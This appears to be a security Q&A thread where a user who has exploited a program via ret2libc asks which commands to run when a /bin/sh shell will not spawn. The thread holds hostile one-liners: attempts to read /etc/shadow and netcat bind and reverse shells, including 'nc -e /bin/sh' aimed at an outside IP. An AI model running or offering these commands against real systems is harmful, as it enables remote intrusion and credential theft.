# What should you do if you cannot spawn a shell in a buffer overflow attack?

Tags: buffer-overflow

I have successfully exploited a program using ret2libc but I am running into a problem.
Whenever I feed `system()` with `/bin/sh` I have nothing in return the program silently exit.

However, if I feed `echo val > /t` and I read `/t` I get `val`.

So  I am able to run partial commands and I want to know which commands can be used instead of spawning a shell?

I thought of:

```
nc -l -p 99 #but I get illegal arg -p
cat /etc/shadow #but I get sh: 1: tc/shadow: not found
```

I would like to know what other possibilities I can execute that would give me access to the vulnerable server/computer bearing in mind that reverse shell (`nc -l -p -e /bin/sh`) didn't work due to string limitation of some sort.

Comment: Can't you read the source code of your app and figure out how the string is handled? Or at least run in a debugger and watch the buffer where your string is, step-by-step? If you don't understand what happens to it you'll have a hard time anyway.

Comment: Also can you write to disk? Can you host a script on it?

Comment: Your -p is missing a port number?

Comment: @SteveDL - no source code is provided, and no I cannot write to disk.
@domen - you can see in the example above I fed `-p 99` to `nc`

Answer (score 1):

A reverse shell should do it.  You have several options.  Read a bit more on it here.

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

With netcat I believe it could be done the following way

```
nc -e /bin/sh 10.0.0.1 1234
```

Comment: Thanks for the reply but as I mentioned earlier. This is not possible due to some string limitations - I don't even understand why do I get "illegal arg -p" when I feed it to system()

Comment: @AK_ How do you expect people to come up with a solution when you don't even know what the problem is? Find out what those "string limitations" are, and maybe someone can suggest you how to work around them.

Comment: @Philipp how would you know what is the limitation? It's not like something I can read or decode